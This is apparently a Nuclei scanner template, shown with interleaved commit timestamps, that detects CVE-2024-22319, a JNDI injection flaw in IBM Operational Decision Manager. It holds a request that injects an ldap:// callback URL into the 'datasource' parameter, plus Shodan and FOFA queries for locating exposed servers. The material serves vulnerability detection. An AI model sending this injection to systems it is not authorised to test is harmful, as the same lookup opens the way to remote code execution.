2024-02-22 11:26:22 +00:00
id : CVE-2024-22319
info :
2024-02-22 11:27:39 +00:00
name : IBM Operational Decision Manager - JNDI Injection
2024-02-22 11:26:22 +00:00
author : DhiyaneshDK
severity : critical
description : |
2024-02-22 11:42:17 +00:00
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID : 279145 .
2024-02-22 11:26:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-22319
cwe-id : CWE-74
2024-05-31 19:23:20 +00:00
epss-score : 0.29329
epss-percentile : 0.96896
2024-02-22 11:26:22 +00:00
cpe : cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 1
vendor : ibm
product : operational_decision_manager
shodan-query : html:"IBM ODM"
fofa-query : title="IBM ODM"
tags : cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
http :
2024-02-22 11:42:17 +00:00
- method : GET
path :
- "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"
2024-02-22 11:26:22 +00:00
matchers :
2024-02-22 11:42:17 +00:00
- type : dsl
dsl :
- contains(interactsh_protocol, "dns")
- 'contains(header, "application/json")'
- 'contains(body, "patchLevel\":")'
- 'status_code == 200'
condition : and
2024-02-22 11:47:40 +00:00
# digest: 4a0a00473045022100bd482d70c6c93cf274bdde0ad6aefa255e1e20edcff44034afb21a45d3fc96e802204f0c9289a94160d4606e60e859ca554ead9d6b21a8441a9d9bf065ec7f9f3cd4:922c64590222798bb761d5b6d8e72950